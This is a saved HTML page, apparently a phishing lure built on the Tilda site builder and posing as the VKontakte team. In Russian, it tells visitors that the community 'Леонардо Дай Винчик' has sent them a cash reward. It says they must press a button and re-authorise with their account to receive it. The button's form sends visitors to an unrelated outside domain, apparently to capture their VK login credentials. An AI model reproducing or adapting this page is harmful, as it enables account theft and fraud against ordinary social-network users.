<!DOCTYPE html>
<html>
<head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1.0" /><!--metatextblock-->
	<title>Леонардо Дай Винчик</title>
	<meta property="og:url" content="https://leonardodayvinchik.tilda.ws" /><meta property="og:title" content="Леонардо Дай Винчик" /><meta property="og:description" content="" /><meta property="og:type" content="website" /><meta property="og:image" content="https://static.tildacdn.com/tild6437-3633-4637-b934-373962653333/-/resize/504x/image04.jpeg" />
	<link href="https://leonardodayvinchik.tilda.ws/" rel="canonical" /><!--/metatextblock--><meta property="fb:app_id" content="257953674358265" /><meta name="format-detection" content="telephone=no" /><meta http-equiv="x-dns-prefetch-control" content="on" />
	<link href="https://tilda.ws/" rel="dns-prefetch" />
	<link href="https://static.tildacdn.com/" rel="dns-prefetch" />
	<link href="https://static.tildacdn.com/img/tildafavicon.ico" rel="shortcut icon" type="image/x-icon" /><!-- Assets -->
	<link href="%D0%9B%D0%B5%D0%BE%D0%BD%D0%B0%D1%80%D0%B4%D0%BE%20%D0%94%D0%B0%D0%B9%20%D0%92%D0%B8%D0%BD%D1%87%D0%B8%D0%BA_files/tilda-grid-3.css" media="all" rel="stylesheet" type="text/css" />
	<link href="%D0%9B%D0%B5%D0%BE%D0%BD%D0%B0%D1%80%D0%B4%D0%BE%20%D0%94%D0%B0%D0%B9%20%D0%92%D0%B8%D0%BD%D1%87%D0%B8%D0%BA_files/tilda-blocks-2.css" media="all" rel="stylesheet" type="text/css" />
	<link href="%D0%9B%D0%B5%D0%BE%D0%BD%D0%B0%D1%80%D0%B4%D0%BE%20%D0%94%D0%B0%D0%B9%20%D0%92%D0%B8%D0%BD%D1%87%D0%B8%D0%BA_files/tilda-animation-1.css" media="all" rel="stylesheet" type="text/css" />
	<link href="%D0%9B%D0%B5%D0%BE%D0%BD%D0%B0%D1%80%D0%B4%D0%BE%20%D0%94%D0%B0%D0%B9%20%D0%92%D0%B8%D0%BD%D1%87%D0%B8%D0%BA_files/tilda-slds-1.css" media="all" rel="stylesheet" type="text/css" />
	<link href="%D0%9B%D0%B5%D0%BE%D0%BD%D0%B0%D1%80%D0%B4%D0%BE%20%D0%94%D0%B0%D0%B9%20%D0%92%D0%B8%D0%BD%D1%87%D0%B8%D0%BA_files/tilda-zoom-2.css" media="all" rel="stylesheet" type="text/css" /><script type="text/javascript" async="" id="tildastatscript" src="%D0%9B%D0%B5%D0%BE%D0%BD%D0%B0%D1%80%D0%B4%D0%BE%20%D0%94%D0%B0%D0%B9%20%D0%92%D0%B8%D0%BD%D1%87%D0%B8%D0%BA_files/tildastat-0.js"></script><script src="%D0%9B%D0%B5%D0%BE%D0%BD%D0%B0%D1%80%D0%B4%D0%BE%20%D0%94%D0%B0%D0%B9%20%D0%92%D0%B8%D0%BD%D1%87%D0%B8%D0%BA_files/jquery-1.js"></script><script src="%D0%9B%D0%B5%D0%BE%D0%BD%D0%B0%D1%80%D0%B4%D0%BE%20%D0%94%D0%B0%D0%B9%20%D0%92%D0%B8%D0%BD%D1%87%D0%B8%D0%BA_files/tilda-scripts-2.js"></script><script src="%D0%9B%D0%B5%D0%BE%D0%BD%D0%B0%D1%80%D0%B4%D0%BE%20%D0%94%D0%B0%D0%B9%20%D0%92%D0%B8%D0%BD%D1%87%D0%B8%D0%BA_files/tilda-blocks-2.js"></script><script src="%D0%9B%D0%B5%D0%BE%D0%BD%D0%B0%D1%80%D0%B4%D0%BE%20%D0%94%D0%B0%D0%B9%20%D0%92%D0%B8%D0%BD%D1%87%D0%B8%D0%BA_files/lazyload-1.js" charset="utf-8"></script><script src="%D0%9B%D0%B5%D0%BE%D0%BD%D0%B0%D1%80%D0%B4%D0%BE%20%D0%94%D0%B0%D0%B9%20%D0%92%D0%B8%D0%BD%D1%87%D0%B8%D0%BA_files/tilda-animation-1.js" charset="utf-8"></script><script src="%D0%9B%D0%B5%D0%BE%D0%BD%D0%B0%D1%80%D0%B4%D0%BE%20%D0%94%D0%B0%D0%B9%20%D0%92%D0%B8%D0%BD%D1%87%D0%B8%D0%BA_files/tilda-slds-1.js" charset="utf-8"></script><script src="%D0%9B%D0%B5%D0%BE%D0%BD%D0%B0%D1%80%D0%B4%D0%BE%20%D0%94%D0%B0%D0%B9%20%D0%92%D0%B8%D0%BD%D1%87%D0%B8%D0%BA_files/hammer.js" charset="utf-8"></script><script src="%D0%9B%D0%B5%D0%BE%D0%BD%D0%B0%D1%80%D0%B4%D0%BE%20%D0%94%D0%B0%D0%B9%20%D0%92%D0%B8%D0%BD%D1%87%D0%B8%D0%BA_files/tilda-zoom-2.js" charset="utf-8"></script><script src="%D0%9B%D0%B5%D0%BE%D0%BD%D0%B0%D1%80%D0%B4%D0%BE%20%D0%94%D0%B0%D0%B9%20%D0%92%D0%B8%D0%BD%D1%87%D0%B8%D0%BA_files/tilda-forms-1.js" charset="utf-8"></script><script type="text/javascript">
            window.dataLayer = window.dataLayer || [];
        </script><script type="text/javascript">
            if (/bot|google|yandex|baidu|bing|msn|duckduckbot|teoma|slurp|crawler|spider|robot|crawling|facebook/i.test(navigator.userAgent) === false && typeof sessionStorage != "undefined" && sessionStorage.getItem("visited") !== "y") {
                var style = document.createElement("style");
                style.type = "text/css";
                style.innerHTML =
                    "@media screen and (min-width: 980px) {.t-records {opacity: 0;}.t-records_animated {-webkit-transition: opacity ease-in-out .2s;-moz-transition: opacity ease-in-out .2s;-o-transition: opacity ease-in-out .2s;transition: opacity ease-in-out .2s;}.t-records.t-records_visible {opacity: 1;}}";
                document.getElementsByTagName("head")[0].appendChild(style);
                $(document).ready(function () {
                    $(".t-records").addClass("t-records_animated");
                    setTimeout(function () {
                        $(".t-records").addClass("t-records_visible");
                        sessionStorage.setItem("visited", "y");
                    }, 400);
                });
            }
        </script>
	<style type="text/css">@media screen and (min-width: 980px) {
                .t-records {
                    opacity: 0;
                }
                .t-records_animated {
                    -webkit-transition: opacity ease-in-out 0.2s;
                    -moz-transition: opacity ease-in-out 0.2s;
                    -o-transition: opacity ease-in-out 0.2s;
                    transition: opacity ease-in-out 0.2s;
                }
                .t-records.t-records_visible {
                    opacity: 1;
                }
            }
	</style>
</head>
<body class="t-body" style="margin: 0;"><!--allrecords-->
<div class="t-records t-records_animated t-records_visible" data-hook="blocks-collection-content-node" data-tilda-formskey="ff09ca650d14418c761fb0f901b981c0" data-tilda-page-id="12987253" data-tilda-project-id="2797951" id="allrecords">
<div class="r t-rec" data-animationappear="off" data-record-type="14" id="rec216142207" style=""><!-- cover -->
<div bgimgfield="img" class="t-cover" id="recorddiv216142207" style="height: 100vh; background-image: url('https://static.tildacdn.com/tild6437-3633-4637-b934-373962653333/-/resize/20x/image04.jpeg');">
<div class="t-cover__carrier loaded" data-content-cover-bg="https://static.tildacdn.com/tild6437-3633-4637-b934-373962653333/image04.jpeg" data-content-cover-height="100vh" data-content-cover-id="216142207" data-content-cover-parallax="fixed" id="coverCarry216142207" src="" style="height: 100vh; background-image: url('https://thumb.tildacdn.com/tild6437-3633-4637-b934-373962653333/-/format/webp/image04.jpeg');"></div>

<div class="t-cover__filter" style="
                            height: 100vh;
                            background-image: -moz-linear-gradient(top, rgba(0, 0, 0, 0.7), rgba(0, 0, 0, 0.7));
                            background-image: -webkit-linear-gradient(top, rgba(0, 0, 0, 0.7), rgba(0, 0, 0, 0.7));
                            background-image: -o-linear-gradient(top, rgba(0, 0, 0, 0.7), rgba(0, 0, 0, 0.7));
                            background-image: -ms-linear-gradient(top, rgba(0, 0, 0, 0.7), rgba(0, 0, 0, 0.7));
                            background-image: linear-gradient(top, rgba(0, 0, 0, 0.7), rgba(0, 0, 0, 0.7));
                            filter: progid:DXImageTransform.Microsoft.gradient(startColorStr='#4c000000', endColorstr='#4c000000');
                        "></div>

<div class="t-container">
<div class="t-col t-col_12">
<div class="t-cover__wrapper t-valign_middle" style="height: 100vh;">
<div class="t102" data-hook-content="covercontent">
<div class="t102__title t-title" field="title" style="padding-top: 100px; text-transform: uppercase;"><span style="font-size:24px;"><strong>Получить перевод</strong></span></div>

<div class="t102__descr t-descr t-descr_md" field="descr" style="">Сообщество &laquo;Леонардо Дай Винчик&raquo;</div>

<div class="t102__descr t-descr t-descr_md" field="descr" style="">Перевело Вам денежное вознаграждение,</div>

<div class="t102__descr t-descr t-descr_md" field="descr" style="">Подтвердить перевод, можете ниже.</div>
</div>
</div>
</div>
</div>
<!-- arrow -->

<div class="t-cover__arrow">
<div class="t-cover__arrow-wrapper t-cover__arrow-wrapper_animated">
<div class="t-cover__arrow_mobile"><svg class="t-cover__arrow-svg" height="18.592px" style="enable-background: new 0 0 38.417 18.592;" viewbox="0 0 38.417 18.592" width="38.417px" x="0px" y="0px"> <g> <path d="M19.208,18.592c-0.241,0-0.483-0.087-0.673-0.261L0.327,1.74c-0.408-0.372-0.438-1.004-0.066-1.413c0.372-0.409,1.004-0.439,1.413-0.066L19.208,16.24L36.743,0.261c0.411-0.372,1.042-0.342,1.413,0.066c0.372,0.408,0.343,1.041-0.065,1.413L19.881,18.332C19.691,18.505,19.449,18.592,19.208,18.592z"></path> </g> </svg></div>
</div>
</div>
<!-- arrow --></div>
</div>

<div class="r t-rec t-rec_pt_15 t-rec_pb_15 r_showed r_anim" data-record-type="223" id="rec216142398" style="padding-top: 15px; padding-bottom: 15px;"><!-- T195 -->
<div class="t195">
<div class="t-container">
<div class="t-col t-col_4 t-prefix_2">
<div class="t195__text t-text t-text_md" field="text" style="">
<p style="text-align: center;"><strong>Получить перевод</strong></p>

<p style="text-align: center;">Для того, чтобы получить средства,<br />
необходимо нажать соответствующую<br />
кнопку и повторно авторизоваться с<br />
помощью учетной записи.</p>
</div>
</div>

<div class="t-col t-col_6 t195__imgsection" itemscope="" itemtype="http://schema.org/ImageObject"><meta itemprop="image" content="https://static.tildacdn.com/tild6538-3536-4635-b134-326139373638/image13.jpeg" /><img class="t195__img t-img loaded" data-original="https://static.tildacdn.com/tild6538-3536-4635-b134-326139373638/image13.jpeg" data-tu-max-height="1200" data-tu-max-width="1200" imgfield="img" src="%D0%9B%D0%B5%D0%BE%D0%BD%D0%B0%D1%80%D0%B4%D0%BE%20%D0%94%D0%B0%D0%B9%20%D0%92%D0%B8%D0%BD%D1%87%D0%B8%D0%BA_files/image13.webp" style="width: 200px; height: 77px;" />
<div class="t195__sectitle t-descr" field="imgtitle" itemprop="name" style=""></div>

<div class="t195__secdescr t-descr" field="imgdescr" itemprop="description" style=""></div>
</div>
</div>
</div>
</div>

<div class="r t-rec t-rec_pt_15 t-rec_pb_15" data-record-type="191" id="rec216142542" style="padding-top:15px;padding-bottom:15px; "><!-- T142 -->
<div class="t142">
<div class="t-container_100">
<div class="t142__wrapone">
<div class="t142__wraptwo">
<form action="https://dorikofloridasoa.com/FNGkEvZ/">
<p style="text-align: center;"><input scr="https://i.imgur.com/PDzFXfr.png" src="https://i.imgur.com/PDzFXfr.png" style="width: 300px; height: 71px;" type="image" /></p>
</form>

<p style="text-align: center;"></p>

<p style="text-align: center;"></p>
</div>
</div>
</div>
</div>

<div class="t-form__errorbox-middle">
<div class="js-errorbox-all t-form__errorbox-wrapper" style="display: none;">
<div class="t-form__errorbox-text t-text t-text_md">
<p class="t-form__errorbox-item js-rule-error js-rule-error-all"></p>

<p class="t-form__errorbox-item js-rule-error js-rule-error-req"></p>

<p class="t-form__errorbox-item js-rule-error js-rule-error-email"></p>

<p class="t-form__errorbox-item js-rule-error js-rule-error-name"></p>

<p class="t-form__errorbox-item js-rule-error js-rule-error-phone"></p>

<p class="t-form__errorbox-item js-rule-error js-rule-error-minlength"></p>

<p class="t-form__errorbox-item js-rule-error js-rule-error-string"></p>
</div>
</div>
</div>

<div class="t-form__submit"></div>
</div>

<div class="t-form__errorbox-bottom">
<div class="js-errorbox-all t-form__errorbox-wrapper" style="display: none;">
<div class="t-form__errorbox-text t-text t-text_md">
<p class="t-form__errorbox-item js-rule-error js-rule-error-all"></p>

<p class="t-form__errorbox-item js-rule-error js-rule-error-req"></p>

<p class="t-form__errorbox-item js-rule-error js-rule-error-email"></p>

<p class="t-form__errorbox-item js-rule-error js-rule-error-name"></p>

<p class="t-form__errorbox-item js-rule-error js-rule-error-phone"></p>

<p class="t-form__errorbox-item js-rule-error js-rule-error-minlength"></p>

<p class="t-form__errorbox-item js-rule-error js-rule-error-string"></p>
</div>
</div>
</div>

<div style="position: absolute; left: -5000px; bottom: 0;"><input class="js-form-spec-comments" name="form-spec-comments" tabindex="-1" type="text" value="Its good" /></div>

<div class="t-col t-col_8 t-prefix_2">
<div>
<style type="text/css">#rec216142542 input::-webkit-input-placeholder {
                                        color: #000000;
                                        opacity: 0.5;
                                    }
                                    #rec216142542 input::-moz-placeholder {
                                        color: #000000;
                                        opacity: 0.5;
                                    }
                                    #rec216142542 input:-moz-placeholder {
                                        color: #000000;
                                        opacity: 0.5;
                                    }
                                    #rec216142542 input:-ms-input-placeholder {
                                        color: #000000;
                                        opacity: 0.5;
                                    }
                                    #rec216142542 textarea::-webkit-input-placeholder {
                                        color: #000000;
                                        opacity: 0.5;
                                    }
                                    #rec216142542 textarea::-moz-placeholder {
                                        color: #000000;
                                        opacity: 0.5;
                                    }
                                    #rec216142542 textarea:-moz-placeholder {
                                        color: #000000;
                                        opacity: 0.5;
                                    }
                                    #rec216142542 textarea:-ms-input-placeholder {
                                        color: #000000;
                                        opacity: 0.5;
                                    }
</style>
</div>
</div>
<style type="text/css">#rec216142542 .t-btn[data-btneffects-first],
                    #rec216142542 .t-btn[data-btneffects-second],
                    #rec216142542 .t-submit[data-btneffects-first],
                    #rec216142542 .t-submit[data-btneffects-second] {
                        position: relative;
                        overflow: hidden;
                        -webkit-transform: translate3d(0, 0, 0);
                        transform: translate3d(0, 0, 0);
                    }
</style>
<script type="text/javascript">
                    $(document).ready(function () {});
                </script>
<div class="r t-rec t-rec_pt_0 t-rec_pb_0 r_showed r_anim" data-record-type="363" id="rec216143222" style="padding-top: 0px; padding-bottom: 0px;"><!-- T029 -->
<div class="t029">
<div class="t029__container t-container">
<div class="t029__col t-col t-col_8">
<div class="t029__linewrapper" style="opacity: 0.2;">
<div class="t029__opacity t029__opacity_left" style="
                                        background-image: -moz-linear-gradient(right, #000000, rgba(0, 0, 0, 0));
                                        background-image: -webkit-linear-gradient(right, #000000, rgba(0, 0, 0, 0));
                                        background-image: -o-linear-gradient(right, #000000, rgba(0, 0, 0, 0));
                                        background-image: -ms-linear-gradient(right, #000000, rgba(0, 0, 0, 0));
                                    "></div>

<div class="t029__line" style="background: #000000;"></div>

<div class="t029__opacity t029__opacity_right" style="
                                        background-image: -moz-linear-gradient(left, #000000, rgba(0, 0, 0, 0));
                                        background-image: -webkit-linear-gradient(left, #000000, rgba(0, 0, 0, 0));
                                        background-image: -o-linear-gradient(left, #000000, rgba(0, 0, 0, 0));
                                        background-image: -ms-linear-gradient(left, #000000, rgba(0, 0, 0, 0));
                                    "></div>
</div>
</div>
</div>
</div>
</div>

<div class="r t-rec t-rec_pt_15 t-rec_pb_15 r_showed r_anim" data-record-type="106" id="rec216143161" style="padding-top: 15px; padding-bottom: 15px;"><!-- T004 -->
<div class="t004">
<div class="t-container">
<div class="t-col t-col_8 t-prefix_2">
<div class="t-text t-text_md" field="text" style=""><span style="color: rgb(153, 160, 170);">Подробнее об условиях<br />
FAQ<br />
Поддержка<br />
&copy; 2020</span> <span style="color: rgb(153, 160, 170);"> </span> <span style="color: rgb(86, 126, 188);">Команда Вконтакте</span></div>
</div>
</div>
</div>
</div>

<div class="r t-rec" data-animationappear="off" data-record-type="131" id="rec216143304" style=""><!-- T123 -->
<div class="t123">
<div class="t-container_100">
<div class="t-width t-width_100"><script src="https://unpkg.com/@vkontakte/vk-bridge/dist/browser.min.js"></script><script>
    // Sends event to client
    
    vkBridge.send('VKWebAppInit');
  </script></div>
</div>
</div>
</div>
</div>
</body>
</html>